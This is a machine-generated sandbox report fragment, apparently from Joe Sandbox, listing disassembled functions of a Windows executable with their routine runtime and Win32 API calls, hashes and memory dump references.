                                                                                                                                    • Instruction ID: c595c3be7dcbdbba2f40eb3034dc4688a01a0e59c1dec2329269979808171d4a
                                                                                                                                    • Opcode Fuzzy Hash: db6ae0074ed855282495a25ef839ffde6b161c55a8c505cb1725ed8a6d5c8498
                                                                                                                                    • Instruction Fuzzy Hash: 25515C6670032395DB329A199C21B7673E0DFA1750F6AC61BF9C99B6C0FB6D8C418361
                                                                                                                                    APIs
                                                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0038FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0038F6CF
                                                                                                                                    • __fassign.LIBCMT ref: 0038F74A
                                                                                                                                    • __fassign.LIBCMT ref: 0038F765
                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0038F78B
                                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,0038FE02,00000000,?,?,?,?,?,?,?,?,?,0038FE02,00000000), ref: 0038F7AA
                                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,0038FE02,00000000,?,?,?,?,?,?,?,?,?,0038FE02,00000000), ref: 0038F7E3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                    • Opcode ID: 959823b8146778455751fee01635ca8a0af6c411c4b3abec9c9a614a7f689e95
                                                                                                                                    • Instruction ID: 4f51bcbf06bc860e9053dd3af21733da2b465ac36f9b01733c2b62d604c80713
                                                                                                                                    • Opcode Fuzzy Hash: 959823b8146778455751fee01635ca8a0af6c411c4b3abec9c9a614a7f689e95
                                                                                                                                    • Instruction Fuzzy Hash: 2851A3B19003099FDB11DFA8DC85AEEBBF8EF09300F1541AAE555E7251E670AA40CBA0
                                                                                                                                    APIs
                                                                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 0037CE9D
                                                                                                                                      • Part of subcall function 0036B690: _wcslen.LIBCMT ref: 0036B696
                                                                                                                                    • _swprintf.LIBCMT ref: 0037CED1
                                                                                                                                      • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,003A946A), ref: 0037CEF1
                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0037CF22
                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0037CFFE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                                                                    • String ID: %s%s%u
                                                                                                                                    • API String ID: 689974011-1360425832
                                                                                                                                    • Opcode ID: 0e62337706d4ae01ddf1d23c1959e348a88d15ea35df1d8ec3455ad6d3536717
                                                                                                                                    • Instruction ID: 7564973a3c1f479132d0fe3db62590c168a8150e497608c6c3e502c623f2d1e8
                                                                                                                                    • Opcode Fuzzy Hash: 0e62337706d4ae01ddf1d23c1959e348a88d15ea35df1d8ec3455ad6d3536717
                                                                                                                                    • Instruction Fuzzy Hash: 84416071900658AADF36DB50DC45EEA77BCEB05300F40C0A6F90DE7041EB789A44CF61
                                                                                                                                    APIs
                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00382937
                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0038293F
                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 003829C8
                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 003829F3
                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00382A48
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                    • String ID: csm
                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                    • Opcode ID: d3e9097407bf6a1163753d4b361fdc4285f8e61dcad809867022ada472f4e938
                                                                                                                                    • Instruction ID: de3babe8bf5b6772dae09a79da6d80216a5897988ca1816a6ec46cd607ff1081
                                                                                                                                    • Opcode Fuzzy Hash: d3e9097407bf6a1163753d4b361fdc4285f8e61dcad809867022ada472f4e938
                                                                                                                                    • Instruction Fuzzy Hash: 6041C234A00308AFCF16EF68C885A9FBBF5AF45324F1480D6E815AB392D735DA51CB91
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen
                                                                                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                    • API String ID: 176396367-3743748572
                                                                                                                                    • Opcode ID: 4d8726f119d399f7a8e999cbb316df6f1881e2df94a7494a2e00b2b8584bafb2
                                                                                                                                    • Instruction ID: 36d0c408be98843a75ecfe7dff2c8374419f6cb5ba02bd1846399e8ca077fb15
                                                                                                                                    • Opcode Fuzzy Hash: 4d8726f119d399f7a8e999cbb316df6f1881e2df94a7494a2e00b2b8584bafb2
                                                                                                                                    • Instruction Fuzzy Hash: A631A27264430556DA32BB549C03F7B73A4EB80720F51C61FF98A4B2C0FB68BD4183A1
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0038C868: _free.LIBCMT ref: 0038C891
                                                                                                                                    • _free.LIBCMT ref: 0038C8F2
                                                                                                                                      • Part of subcall function 00388DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?), ref: 00388DE2
                                                                                                                                      • Part of subcall function 00388DCC: GetLastError.KERNEL32(?,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?,?), ref: 00388DF4
                                                                                                                                    • _free.LIBCMT ref: 0038C8FD
                                                                                                                                    • _free.LIBCMT ref: 0038C908
                                                                                                                                    • _free.LIBCMT ref: 0038C95C
                                                                                                                                    • _free.LIBCMT ref: 0038C967
                                                                                                                                    • _free.LIBCMT ref: 0038C972
                                                                                                                                    • _free.LIBCMT ref: 0038C97D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                    • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                    • Instruction ID: bf1f6088252f0041dacd8b31dbabbf9fb8f6507266c8744e43d4b1591f41a24c
                                                                                                                                    • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                    • Instruction Fuzzy Hash: 5E1163715D0B08BAE522B7B1CC0BFCB7BADEF00B00F801C55B29D6E592EA75B5098760
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0037E669,0037E5CC,0037E86D), ref: 0037E605
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0037E61B
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0037E630
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                    • API String ID: 667068680-1718035505
                                                                                                                                    • Opcode ID: 9bca716975354faa2f58efcfa3070d5f678716004981292273373ca8ec3d5c59
                                                                                                                                    • Instruction ID: a38114352668f05c9ee803f0372b35c57939219cbbe0d683dbaaf639ac8906d7
                                                                                                                                    • Opcode Fuzzy Hash: 9bca716975354faa2f58efcfa3070d5f678716004981292273373ca8ec3d5c59
                                                                                                                                    • Instruction Fuzzy Hash: 7DF02BB57802225B4F335F755C84AA632CC6B2E741712C4B9E90ED3201EB28CC606B90
                                                                                                                                    APIs
                                                                                                                                    • _free.LIBCMT ref: 0038891E
                                                                                                                                      • Part of subcall function 00388DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?), ref: 00388DE2
                                                                                                                                      • Part of subcall function 00388DCC: GetLastError.KERNEL32(?,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?,?), ref: 00388DF4
                                                                                                                                    • _free.LIBCMT ref: 00388930
                                                                                                                                    • _free.LIBCMT ref: 00388943
                                                                                                                                    • _free.LIBCMT ref: 00388954
                                                                                                                                    • _free.LIBCMT ref: 00388965
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                    • String ID: p9
                                                                                                                                    • API String ID: 776569668-1904256876
                                                                                                                                    • Opcode ID: fdf6a842b2277d13eaa610a2fb94ee3449f362d5e48a9d1b15ac801979258f33
                                                                                                                                    • Instruction ID: 51f6e7597ec5d839c00307d72c53b6ae5e7a73af024ecd2d107c4f3c9e006e50
                                                                                                                                    • Opcode Fuzzy Hash: fdf6a842b2277d13eaa610a2fb94ee3449f362d5e48a9d1b15ac801979258f33
                                                                                                                                    • Instruction Fuzzy Hash: DDF0D076810212DB8687BF24FD018163BAAF724724F810546F554D63B1CFB25D569B91
                                                                                                                                    APIs
                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 003714C2
                                                                                                                                      • Part of subcall function 0036B146: GetVersionExW.KERNEL32(?), ref: 0036B16B
                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003714E6
                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00371500
                                                                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00371513
                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00371523
                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00371533
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2092733347-0
                                                                                                                                    • Opcode ID: 2ce4ed4a85ffaa945ade7845202aa451fbfef8579b5f7433d189b63a69fe0ff1
                                                                                                                                    • Instruction ID: 1972b86c7d3284ff62065b7c64640106545071710f9e9525fbefeadb87153ffc
                                                                                                                                    • Opcode Fuzzy Hash: 2ce4ed4a85ffaa945ade7845202aa451fbfef8579b5f7433d189b63a69fe0ff1
                                                                                                                                    • Instruction Fuzzy Hash: 3C31FA76118305ABC705DFA9C88499BB7FCBF98714F00491EF599C3210E734D549CBA6
                                                                                                                                    APIs
                                                                                                                                    • GetLastError.KERNEL32(?,?,00382AF1,003802FC,0037FA34), ref: 00382B08
                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00382B16
                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00382B2F
                                                                                                                                    • SetLastError.KERNEL32(00000000,00382AF1,003802FC,0037FA34), ref: 00382B81
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                    • Opcode ID: 8b9deefe89c355e4955f912583bcec88be14b595c5934d33c906ac9315a6bed7
                                                                                                                                    • Instruction ID: a56b27f71d7cf575e9d17aa7a2d3d3d8bb1a5e51ffa4cc694eb2df827d21dfcf
                                                                                                                                    • Opcode Fuzzy Hash: 8b9deefe89c355e4955f912583bcec88be14b595c5934d33c906ac9315a6bed7
                                                                                                                                    • Instruction Fuzzy Hash: 4001D43310A711AEE6273BF4BC899672B9DEB41BB4B6007BBF510592E0EF625C40D344
                                                                                                                                    APIs
                                                                                                                                    • GetLastError.KERNEL32(?,003A1030,00384674,003A1030,?,?,00383F73,00000050,?,003A1030,00000200), ref: 003897E9
                                                                                                                                    • _free.LIBCMT ref: 0038981C
                                                                                                                                    • _free.LIBCMT ref: 00389844
                                                                                                                                    • SetLastError.KERNEL32(00000000,?,003A1030,00000200), ref: 00389851
                                                                                                                                    • SetLastError.KERNEL32(00000000,?,003A1030,00000200), ref: 0038985D
                                                                                                                                    • _abort.LIBCMT ref: 00389863
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                    • Opcode ID: 20f022e759e30ac85defc4e06a444639c2dc7f16df2dfa2717cf9f4da929b622
                                                                                                                                    • Instruction ID: f8fae1f6cb7768ed38c9422440caccb48a6fcf59ebc2f55428593429b002ac63
                                                                                                                                    • Opcode Fuzzy Hash: 20f022e759e30ac85defc4e06a444639c2dc7f16df2dfa2717cf9f4da929b622
                                                                                                                                    • Instruction Fuzzy Hash: 22F0C83614070366C6133374BC0AB7B1A6D8FD2771F2A05ABF525AA292FF3188068765
                                                                                                                                    APIs
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0037DC47
                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037DC61
                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037DC72
                                                                                                                                    • TranslateMessage.USER32(?), ref: 0037DC7C
                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0037DC86
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0037DC91
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2148572870-0
                                                                                                                                    • Opcode ID: 5bf4e77677001fdf783dde8d167976c6580c101bddcafb44700d6af329d52384
                                                                                                                                    • Instruction ID: 3ec7e4b3a4e686e1f298604d8da7f75361064f9c24627bfa1c4cfa752fd3d022
                                                                                                                                    • Opcode Fuzzy Hash: 5bf4e77677001fdf783dde8d167976c6580c101bddcafb44700d6af329d52384
                                                                                                                                    • Instruction Fuzzy Hash: ABF03C72A01229BBCB326BA5EC4DDDB7F7DEF41791F008011B50BD2050D6799646CBA0
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0037A699: GetDC.USER32(00000000), ref: 0037A69D
                                                                                                                                      • Part of subcall function 0037A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0037A6A8
                                                                                                                                      • Part of subcall function 0037A699: ReleaseDC.USER32(00000000,00000000), ref: 0037A6B3
                                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0037A83C
                                                                                                                                      • Part of subcall function 0037AAC9: GetDC.USER32(00000000), ref: 0037AAD2
                                                                                                                                      • Part of subcall function 0037AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0037AB01
                                                                                                                                      • Part of subcall function 0037AAC9: ReleaseDC.USER32(00000000,?), ref: 0037AB99
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                                                                    • String ID: "7$($A7
                                                                                                                                    • API String ID: 1061551593-3396645701
                                                                                                                                    • Opcode ID: 9640c8597578d0effdccbf1cb95a8ef6ddb4aaf1c5e3412271874d7f6e2dd501
                                                                                                                                    • Instruction ID: dc3a7abdf124029d27981604d5698bb97cf0bb1aebefc952a537c13489f3cc48
                                                                                                                                    • Opcode Fuzzy Hash: 9640c8597578d0effdccbf1cb95a8ef6ddb4aaf1c5e3412271874d7f6e2dd501
                                                                                                                                    • Instruction Fuzzy Hash: A991F2B1608754AFD661DF29C84492BBBF8FFC9700F00891EF59AD3260DB35A945CB62
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 003705DA: _wcslen.LIBCMT ref: 003705E0
